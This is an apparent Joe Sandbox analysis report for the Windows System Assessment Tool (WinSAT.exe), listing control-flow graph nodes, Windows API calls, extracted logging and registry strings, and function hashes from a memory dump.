2036->2038 2039 7ff780face92-7ff780faced4 GetLastError call 7ff780fdc700 SetLastError GetLastError 2037->2039 2040 7ff780facc1d-7ff780facc2b call 7ff780fde080 2037->2040 2038->2037 2039->1981 2040->2039 2045 7ff780facc31-7ff780facc35 2040->2045 2046 7ff780faccc3-7ff780facccd 2045->2046 2047 7ff780facc3b-7ff780facc63 call 7ff780fa8010 call 7ff780fde178 2045->2047 2046->1978 2048 7ff780faccd3-7ff780facd07 call 7ff780fdc700 call 7ff780fa9c0c call 7ff780fa2944 call 7ff780fa28c4 2046->2048 2047->1954 2057 7ff780facc69-7ff780facc73 2047->2057 2067 7ff780facd0c-7ff780facd27 call 7ff780fa8010 2048->2067 2059 7ff780facc75-7ff780facc7a 2057->2059 2060 7ff780facc9a-7ff780faccc1 call 7ff780fa7e24 2057->2060 2059->2060 2063 7ff780facc7c-7ff780facc82 2059->2063 2060->2067 2063->2060 2066 7ff780facc84-7ff780facc8b 2063->2066 2068 7ff780facc92-7ff780facc95 call 7ff7810a458c 2066->2068 2069 7ff780facc8d call 7ff7810a458c 2066->2069 2067->1975 2074 7ff780facd2d-7ff780facd47 call 7ff780fac894 2067->2074 2068->2060 2069->2068 2074->1971 2077 7ff780facd4d-7ff780facd7a call 7ff780fac894 call 7ff780fa8148 2074->2077 2077->1967 2082 7ff780facd80-7ff780facdbf call 7ff780fac894 call 7ff780fa7e24 call 7ff780fa8010 call 7ff780faf0dc 2077->2082 2082->1961 2091 7ff780facdc5-7ff780facdce 2082->2091 2092 7ff780facdd0-7ff780facdd5 2091->2092 2093 7ff780facdf5-7ff780face0f call 7ff780fa7e24 2091->2093 2092->2093 2094 7ff780facdd7-7ff780facddd 2092->2094 2093->1959 2100 7ff780face15-7ff780face1c call 7ff780fa8a40 2093->2100 2094->2093 2096 7ff780facddf-7ff780facde6 2094->2096 2098 7ff780facde8 call 7ff7810a458c 2096->2098 2099 7ff780facded-7ff780facdf0 call 7ff7810a458c 2096->2099 2098->2099 2099->2093 2105 7ff780face82-7ff780face8b call 7ff780fa7e24 2100->2105 2106 7ff780face1e-7ff780face25 2100->2106 2105->2039 2106->2105 2107 7ff780face27-7ff780face3b 2106->2107 2107->1956 2109 7ff780face41-7ff780face81 call 7ff780fa9c0c call 7ff780faed64 call 7ff780f92e8c call 7ff780fa2944 call 7ff780fa28c4 2107->2109 2109->2105
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000016.00000002.2235531661.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000016.00000002.2235480708.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2235836355.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2235948583.00007FF78110D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236004824.00007FF78110E000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236050867.00007FF78110F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236087919.00007FF781110000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236398901.00007FF781167000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236447819.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrow$ErrorLast$FileModuleName
                                                                                                                                                                                              • String ID: %SystemRoot%\system32\WinSAT.exe$%WINSAT%$Private > Winsat aux environment string is '$SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinSAT$\Private$base\winsat\exe\app.cpp$cannot load module title
                                                                                                                                                                                              • API String ID: 1694354162-568184922
                                                                                                                                                                                              • Opcode ID: 1d4f7037371eb10e463b2bffa1485248664b458afc5f4475ea499e8910b523ee
                                                                                                                                                                                              • Instruction ID: b23dc54060e7e25e92ed3d902aaad4273dc2e9a76f979673d154919406760aae
                                                                                                                                                                                              • Opcode Fuzzy Hash: 1d4f7037371eb10e463b2bffa1485248664b458afc5f4475ea499e8910b523ee
                                                                                                                                                                                              • Instruction Fuzzy Hash: 83128A22A0DA4289EF44FF22D8501B8A760FF41B98BA4A131EA0E177D6DF7CE555C360
                                                                                                                                                                                              Function 00007FF780FCA818 Relevance: 49.9, APIs: 4, Strings: 29, Instructions: 403COMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 2121 7ff780fca818-7ff780fca855 call 7ff780fa80d4 * 2 2126 7ff780fca965-7ff780fca96a 2121->2126 2127 7ff780fca85b 2121->2127 2128 7ff780fcabe6-7ff780fcac05 call 7ff780fcafc0 * 2 2126->2128 2129 7ff780fca970-7ff780fca973 2126->2129 2130 7ff780fca861-7ff780fca865 2127->2130 2131 7ff780fca94c-7ff780fca963 call 7ff780fcafc0 2127->2131 2159 7ff780fcac0a-7ff780fcac26 call 7ff780fa8d78 * 2 2128->2159 2135 7ff780fca979-7ff780fca97c 2129->2135 2136 7ff780fcabca-7ff780fcabdc call 7ff780fcafc0 2129->2136 2132 7ff780fca923-7ff780fca935 call 7ff780fcafc0 2130->2132 2133 7ff780fca86b-7ff780fca86e 2130->2133 2146 7ff780fca93a-7ff780fca947 call 7ff780fcafc0 2131->2146 2132->2146 2139 7ff780fca874-7ff780fca877 2133->2139 2140 7ff780fca90a-7ff780fca921 call 7ff780fcafc0 2133->2140 2142 7ff780fca982-7ff780fca985 2135->2142 2143 7ff780fcabae-7ff780fcabc0 call 7ff780fcafc0 2135->2143 2136->2128 2147 7ff780fca8f6-7ff780fca908 call 7ff780fcafc0 2139->2147 2148 7ff780fca879-7ff780fca87c 2139->2148 2140->2146 2150 7ff780fca98b-7ff780fca98e 2142->2150 2151 7ff780fcab1a-7ff780fcab24 2142->2151 2143->2136 2146->2159 2147->2146 2157 7ff780fca8dd-7ff780fca8f4 call 7ff780fcafc0 2148->2157 2158 7ff780fca87e-7ff780fca881 2148->2158 2160 7ff780fca994-7ff780fca997 2150->2160 2161 7ff780fcaafe-7ff780fcab10 call 7ff780fcafc0 2150->2161 2162 7ff780fcab26-7ff780fcab34 2151->2162 2163 7ff780fcab92-7ff780fcab9f call 7ff780fcafc0 2151->2163 2157->2146 2170 7ff780fca883-7ff780fca886 2158->2170 2171 7ff780fca8c4-7ff780fca8db call 7ff780fcafc0 2158->2171 2210 7ff780fcac6c 2159->2210 2211 7ff780fcac28-7ff780fcac30 2159->2211 2174 7ff780fcaae2-7ff780fcaaf4 call 7ff780fcafc0 2160->2174 2175 7ff780fca99d-7ff780fca9c2 call 7ff780fce3ac 2160->2175 2161->2151 2176 7ff780fcab36-7ff780fcab3b 2162->2176 2177 7ff780fcab67-7ff780fcab76 2162->2177 2183 7ff780fcaba4 2163->2183 2181 7ff780fca8ab-7ff780fca8c2 call 7ff780fcafc0 2170->2181 2182 7ff780fca888-7ff780fca88b 2170->2182 2171->2146 2174->2161 2201 7ff780fcaac6-7ff780fcaad8 call 7ff780fcafc0 2175->2201 2202 7ff780fca9c8-7ff780fca9d2 2175->2202 2176->2177 2190 7ff780fcab3d-7ff780fcab48 2176->2190 2179 7ff780fcab88-7ff780fcab90 2177->2179 2180 7ff780fcab78-7ff780fcab83 call 7ff780fa7e24 call 7ff7810a458c 2177->2180 2179->2183 2180->2179 2181->2146 2182->2175 2192 7ff780fca891-7ff780fca8a6 call 7ff780fcafc0 2182->2192 2183->2143 2190->2177 2195 7ff780fcab4a-7ff780fcab51 2190->2195 2192->2146 2205 7ff780fcab53 call 7ff7810a458c 2195->2205 2206 7ff780fcab58-7ff780fcab60 call 7ff7810a458c 2195->2206 2201->2174 2202->2201 2212 7ff780fca9d8-7ff780fca9e6 2202->2212 2205->2206 2206->2177 2218 7ff780fcac72-7ff780fcac74 2210->2218 2211->2218 2219 7ff780fcac32-7ff780fcac67 call 7ff780fc9f64 2211->2219 2216 7ff780fcaa20-7ff780fcaa3a 2212->2216 2217 7ff780fca9e8-7ff780fca9ed 2212->2217 2221 7ff780fcaa74-7ff780fcaa83 2216->2221 2222 7ff780fcaa3c-7ff780fcaa41 2216->2222 2217->2216 2224 7ff780fca9ef-7ff780fca9fa 2217->2224 2225 7ff780fcaf5a-7ff780fcaf72 call 7ff780fce3ac 2218->2225 2226 7ff780fcac7a-7ff780fcac84 2218->2226 2219->2210 2232 7ff780fcaa85-7ff780fcaa95 call 7ff780fa7e24 call 7ff7810a458c 2221->2232 2233 7ff780fcaa9c-7ff780fcaaa7 2221->2233 2222->2221 2231 7ff780fcaa43-7ff780fcaa4e 2222->2231 2224->2216 2230 7ff780fca9fc-7ff780fcaa03 2224->2230 2244 7ff780fcaf73-7ff780fcaf9d call 7ff780fa7e24 * 2 2225->2244 2227 7ff780fcafa1-7ff780fcafb7 _CxxThrowException 2226->2227 2228 7ff780fcac8a-7ff780fcac91 call 7ff780fa8a40 2226->2228 2228->2225 2251 7ff780fcac97-7ff780fcac9e 2228->2251 2239 7ff780fcaa05 call 7ff7810a458c 2230->2239 2240 7ff780fcaa0a-7ff780fcaa19 call 7ff7810a458c 2230->2240 2231->2221 2238 7ff780fcaa50-7ff780fcaa57 2231->2238 2232->2233 2236 7ff780fcaab9-7ff780fcaac1 2233->2236 2237 7ff780fcaaa9-7ff780fcaab4 call 7ff780fa7e24 call 7ff7810a458c 2233->2237 2236->2159 2237->2236 2248 7ff780fcaa5e-7ff780fcaa6d call 7ff7810a458c 2238->2248 2249 7ff780fcaa59 call 7ff7810a458c 2238->2249 2239->2240 2240->2216 2248->2221 2249->2248 2251->2225 2258 7ff780fcaca4-7ff780fcacab 2251->2258 2258->2225 2262 7ff780fcacb1-7ff780fcae1f call 7ff780fce3ac call 7ff780fa8010 call 7ff780faf844 call 7ff780fa7e24 call 7ff780fa8010 call 7ff780faf844 call 7ff780fa80d4 * 2 call 7ff780fa7e24 call 7ff780fa8010 call 7ff780faf844 call 7ff780fa80d4 * 2 call 7ff780fa7e24 2258->2262 2293 7ff780fcae21-7ff780fcae29 2262->2293 2294 7ff780fcae2b-7ff780fcae37 call 7ff780fe08d0 2262->2294 2293->2294 2295 7ff780fcae3c-7ff780fcae72 call 7ff780fe0e34 * 2 call 7ff780fe08d0 2293->2295 2294->2295 2303 7ff780fcae74-7ff780fcae9a GetLastError call 7ff780fce694 2295->2303 2304 7ff780fcae9f-7ff780fcaeae call 7ff780fe08d0 2295->2304 2303->2304 2308 7ff780fcaeb0-7ff780fcaee3 GetLastError call 7ff780fce694 2304->2308 2309 7ff780fcaee8-7ff780fcaef0 call 7ff780fe08d0 2304->2309 2308->2309 2312 7ff780fcaef5-7ff780fcaef7 2309->2312 2313 7ff780fcaf32-7ff780fcaf58 call 7ff780fe0c40 * 2 call 7ff780fe095c 2312->2313 2314 7ff780fcaef9-7ff780fcaf31 GetLastError call 7ff780fce694 2312->2314 2313->2244 2314->2313
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000016.00000002.2235531661.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000016.00000002.2235480708.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2235836355.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2235948583.00007FF78110D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236004824.00007FF78110E000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236050867.00007FF78110F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236087919.00007FF781110000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236398901.00007FF781167000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236447819.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ErrorLast$EnabledEvent$CountCurrentFormatFreeLocalMessageProcessTick_snprintf_s_vsnprintf_s
                                                                                                                                                                                              • String ID: <Message>$ <Hresult>$ </Error>$ <Error>$ </ErrorsAndWarnings>$ <ErrorsAndWarnings>$</AssessmentResult>$</Hresult>$</Message>$<?xml version="1.0" encoding="UTF-8" standalone="yes"?>$<AssessmentResult>$AxeErrorXML: Error creating results.xml file.$Can't write error message '%s' to the registry$Can't write last exit code %u to the registry$Cannot open registry value %s$Cannot open winsat registry key$Cannot read registry value %s$Cannot write registry value %s$ERROR: failed to save can't and why error mesages to the registry$LastExitCode$LastExitCodeCantMsg$LastExitCodeWhyMsg$SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinSAT$Skipping writing the exit code, cant msg and why msg to registry$Unspecified error %u occured.$Writing exit code, cant msg and why msg to registry $base\winsat\exe\processwinsaterror.cpp$results.xml$w, ccs=UTF-8
                                                                                                                                                                                              • API String ID: 3131830483-4286113941
                                                                                                                                                                                              • Opcode ID: 26a9d983f1d58d7053ba85c5d56a9019545f4cb55e188ab8bd7b0d6d368bb9a9
                                                                                                                                                                                              • Instruction ID: 340079989d89b07db99972c1ac93a6819d53e5b0308ae5c8da6b10a03a498ba6
                                                                                                                                                                                              • Opcode Fuzzy Hash: 26a9d983f1d58d7053ba85c5d56a9019545f4cb55e188ab8bd7b0d6d368bb9a9
                                                                                                                                                                                              • Instruction Fuzzy Hash: BE125E21A0D99291FA60BB11E4523FAE360FF81718FE48431D68D46BDADE7CF946C721
                                                                                                                                                                                              Function 00007FF780F9EA58 Relevance: 31.7, APIs: 11, Strings: 7, Instructions: 185memorylibraryCOMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 2376 7ff780f9ea58-7ff780f9eaa5 HeapSetInformation call 7ff780f9a3c0 2380 7ff780f9eb65-7ff780fa04bc call 7ff780f9def4 call 7ff780fdcdb8 call 7ff780fce3ac call 7ff780fcf3b4 2376->2380 2381 7ff780f9eaab-7ff780f9eb54 LoadLibraryW GetLastError SetLastError 2376->2381 2396 7ff780fa0516-7ff780fa052f call 7ff780fca818 SetConsoleCtrlHandler 2380->2396 2397 7ff780fa04be-7ff780fa04c8 2380->2397 2381->2380 2388 7ff780f9eb56-7ff780f9eb60 FreeLibrary 2381->2388 2388->2380 2404 7ff780fa0531-7ff780fa0556 GetLastError call 7ff780fa9820 2396->2404 2405 7ff780fa0583-7ff780fa058a 2396->2405 2399 7ff780fa0af1-7ff780fa0b0c _CxxThrowException 2397->2399 2400 7ff780fa04ce-7ff780fa04d5 call 7ff780fa8a40 2397->2400 2403 7ff780fa0b0d-7ff780fa0b3f _CxxThrowException 2399->2403 2400->2396 2410 7ff780fa04d7-7ff780fa04de 2400->2410 2407 7ff780fa0b51-7ff780fa0b56 2403->2407 2408 7ff780fa0b41-7ff780fa0b4d FreeLibrary 2403->2408 2404->2403 2420 7ff780fa055c-7ff780fa057e call 7ff780fa9c0c call 7ff780fa2944 call 7ff780fa28c4 2404->2420 2411 7ff780fa0591-7ff780fa0598 2405->2411 2412 7ff780fa058c call 7ff780f9a698 2405->2412 2408->2407 2410->2396 2416 7ff780fa04e0-7ff780fa04e7 2410->2416 2413 7ff780fa05a0-7ff780fa05ba call 7ff780f9ae84 2411->2413 2414 7ff780fa059a-7ff780fa059f call 7ff78100b75c 2411->2414 2412->2411 2429 7ff780fa05c8-7ff780fa05e4 RemoveDirectoryW 2413->2429 2430 7ff780fa05bc-7ff780fa05c3 CoUninitialize 2413->2430 2414->2413 2416->2396 2421 7ff780fa04e9-7ff780fa04f0 2416->2421 2420->2405 2421->2396 2425 7ff780fa04f2-7ff780fa0508 call 7ff780fdb218 2421->2425 2425->2396 2436 7ff780fa050a-7ff780fa0511 call 7ff780fdb318 2425->2436 2433 7ff780fa05e6-7ff780fa05ed 2429->2433 2434 7ff780fa0635-7ff780fa063a 2429->2434 2430->2429 2433->2434 2439 7ff780fa05ef-7ff780fa05f9 2433->2439 2437 7ff780fa0665-7ff780fa066f 2434->2437 2438 7ff780fa063c-7ff780fa0643 2434->2438 2436->2396 2444 7ff780fa0671-7ff780fa0690 ReleaseMutex CloseHandle 2437->2444 2445 7ff780fa0697-7ff780fa069e 2437->2445 2442 7ff780fa0645-7ff780fa064f 2438->2442 2443 7ff780fa065e 2438->2443 2439->2434 2446 7ff780fa05fb-7ff780fa061a 2439->2446 2442->2443 2447 7ff780fa0651 2442->2447 2443->2437 2444->2445 2448 7ff780fa06a0-7ff780fa06de call 7ff780f95c78 2445->2448 2449 7ff780fa06e3-7ff780fa0af0 call 7ff780fd5424 call 7ff780fcf510 call 7ff780fce3ac call 7ff780fce2f8 call 7ff780fa7e24 * 2 _CxxThrowException * 27 2445->2449 2446->2434 2454 7ff780fa061c-7ff780fa0628 2446->2454 2447->2443 2448->2449 2449->2399 2454->2434
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000016.00000002.2235531661.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000016.00000002.2235480708.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2235836355.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2235948583.00007FF78110D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236004824.00007FF78110E000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236050867.00007FF78110F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236087919.00007FF781110000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236398901.00007FF781167000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236447819.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ErrorLast$Library$ConsoleCtrlDirectoryFreeHandlerHeapInformationLoadRemoveUninitializeVersion
                                                                                                                                                                                              • String ID: > exit value = %d.$Cleanup and exit$ERROR: cannot initialize handle streams$Kernel32.dll$PrivateError2$base\winsat\exe\main.cpp$A#
                                                                                                                                                                                              • API String ID: 2285653341-2875148813
                                                                                                                                                                                              • Opcode ID: 5cd9e2d094684c900b0a1822dbd1beab9fb2b5d15797ac5c376e857a1df992c8
                                                                                                                                                                                              • Instruction ID: feb504a3e82826df83896d265925d6554e305c87b82159c7a5afc1ce9cb0cb14
                                                                                                                                                                                              • Opcode Fuzzy Hash: 5cd9e2d094684c900b0a1822dbd1beab9fb2b5d15797ac5c376e857a1df992c8
                                                                                                                                                                                              • Instruction Fuzzy Hash: 03917E20E0D68285FB60BB11F8502BAEBA0BF85758FF49035D94E027E5DEACF454CB20
                                                                                                                                                                                              Function 00007FF780FDCDB8 Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 203fileCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000016.00000002.2235531661.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000016.00000002.2235480708.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2235836355.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2235948583.00007FF78110D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236004824.00007FF78110E000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236050867.00007FF78110F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236087919.00007FF781110000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236398901.00007FF781167000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236447819.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrow$Handle$ConsoleCreateErrorFileInformationLastOutput
                                                                                                                                                                                              • String ID: CONOUT$
                                                                                                                                                                                              • API String ID: 3315080193-3130406586
                                                                                                                                                                                              • Opcode ID: 1d280d1140a609a4120c229eabe1faaa780790c509dd60a0aca176df560ac830
                                                                                                                                                                                              • Instruction ID: 85a74f63ab5352ecd65863a122748accec8442d77c033781aeb52a0d607d8206
                                                                                                                                                                                              • Opcode Fuzzy Hash: 1d280d1140a609a4120c229eabe1faaa780790c509dd60a0aca176df560ac830
                                                                                                                                                                                              • Instruction Fuzzy Hash: A3917022A0C64782EF00BF15E854278AB61FF81BA4FA49235DA6D177E8DF7CE405C720
                                                                                                                                                                                              Function 00007FF780F9F278 Relevance: 26.4, APIs: 6, Strings: 9, Instructions: 188synchronizationCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000016.00000002.2235531661.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000016.00000002.2235480708.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2235836355.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2235948583.00007FF78110D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236004824.00007FF78110E000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236050867.00007FF78110F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236087919.00007FF781110000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236398901.00007FF781167000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236447819.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrow$Resource$Close$CriticalEnabledEventHandleOpenSectionValue__uncaught_exception$ConsoleCountCtrlCurrentDirectoryEnterErrorFileFindFreeHandlerLastLeaveLibraryLoadLockModuleMutexProcessQueryReleaseRemoveSizeofStringTickTypeUninitializeVersionWrite_snprintf_s_vsnprintf_s
                                                                                                                                                                                              • String ID: > IsFormal=TRUE IsMoobe=%s.$> exit value = %d.$Cleanup and exit$ERROR: can't run formal assessment on OS's earlier than Vista$FALSE$PrivateError2$TRUE$A#$U5
                                                                                                                                                                                              • API String ID: 3609148696-4083962618
                                                                                                                                                                                              • Opcode ID: 0239aa5fd20ae61fbb236b0a29be8b192bc8d37e31c6169b1712d043d27c94a7
                                                                                                                                                                                              • Instruction ID: f11b958aa92d5b8fc14d2f8a5af622dcc462b61e1b80ed87ab309aa65e918ef9
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0239aa5fd20ae61fbb236b0a29be8b192bc8d37e31c6169b1712d043d27c94a7
                                                                                                                                                                                              • Instruction Fuzzy Hash: E4916E20E0D68385FB60BB11B8511BAEB50BF85B88FF89035D94E067E6DEADB454C760
                                                                                                                                                                                              Function 00007FF780FCDC70 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 135filetimeCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 00007FF780FA941C: SetLastError.KERNEL32 ref: 00007FF780FA944C
                                                                                                                                                                                              • CreateFileW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF780FCE1A8), ref: 00007FF780FCDD45
                                                                                                                                                                                              • GetFileSizeEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF780FCE1A8), ref: 00007FF780FCDD69
                                                                                                                                                                                              • SetEndOfFile.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF780FCE1A8), ref: 00007FF780FCDD8E
                                                                                                                                                                                              • SetFilePointer.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF780FCE1A8), ref: 00007FF780FCDDA9
                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF780FCE1A8), ref: 00007FF780FCDDC1
                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF780FCE1A8), ref: 00007FF780FCDDDC
                                                                                                                                                                                              • WriteFile.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF780FCE1A8), ref: 00007FF780FCDE11
                                                                                                                                                                                              • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF780FCE1A8), ref: 00007FF780FCDE24
                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF780FCE1A8), ref: 00007FF780FCDE37
                                                                                                                                                                                              • GetLocalTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF780FCE1A8), ref: 00007FF780FCDE47
                                                                                                                                                                                              • GetTimeFormatW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF780FCE1A8), ref: 00007FF780FCDE77
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000016.00000002.2235531661.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000016.00000002.2235480708.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2235836355.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2235948583.00007FF78110D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236004824.00007FF78110E000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236050867.00007FF78110F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236087919.00007FF781110000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236398901.00007FF781167000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236447819.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: File$CriticalSectionTime$BuffersCloseCreateEnterErrorFlushFormatHandleLastLeaveLocalPointerSizeWrite
                                                                                                                                                                                              • String ID: --- START %d\%d\%d %S ---$AssessmentResultsPath$\winsat.log$base\winsat\exe\logging.cpp
                                                                                                                                                                                              • API String ID: 2715792050-1280026481
                                                                                                                                                                                              • Opcode ID: afa961589de5e33d04434e724ff52634cb44c442c321d86f7789c82287e94371
